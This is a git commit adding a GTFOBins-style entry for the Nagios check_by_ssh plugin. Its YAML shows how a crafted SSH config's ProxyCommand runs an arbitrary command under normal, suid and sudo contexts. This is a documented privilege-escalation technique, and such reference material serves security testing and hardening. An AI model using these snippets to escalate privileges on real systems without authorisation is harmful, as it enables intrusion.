New command: check_by_ssh

master
Emanuel Duss 2020-11-12 14:21:00 +01:00
parent cbfec71fa5
commit 127738e927
1 changed files with 29 additions and 0 deletions

29
_gtfobins/check_by_ssh.md Normal file
View File

@ -0,0 +1,29 @@
---
description: |
This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`.
functions:
command:
- code: |
COMMAND='/usr/bin/id'
OUTPUT="output_file"
TF=$(mktemp)
echo "ProxyCommand \"$COMMAND\" | tee \"$OUTPUT\"" > $TF
check_by_ssh -F "$TF" -H localhost -C something
cat $OUTPUT
suid:
- code: |
COMMAND='/usr/bin/id'
OUTPUT="output_file"
TF=$(mktemp)
echo "ProxyCommand \"$COMMAND\" | tee \"$OUTPUT\"" > $TF
check_by_ssh -F "$TF" -H localhost -C something
cat $OUTPUT
sudo:
- code: |
COMMAND='/usr/bin/id'
OUTPUT="output_file"
TF=$(mktemp)
echo "ProxyCommand \"$COMMAND\" | tee \"$OUTPUT\"" > $TF
check_by_ssh -F "$TF" -H localhost -C something
cat $OUTPUT
---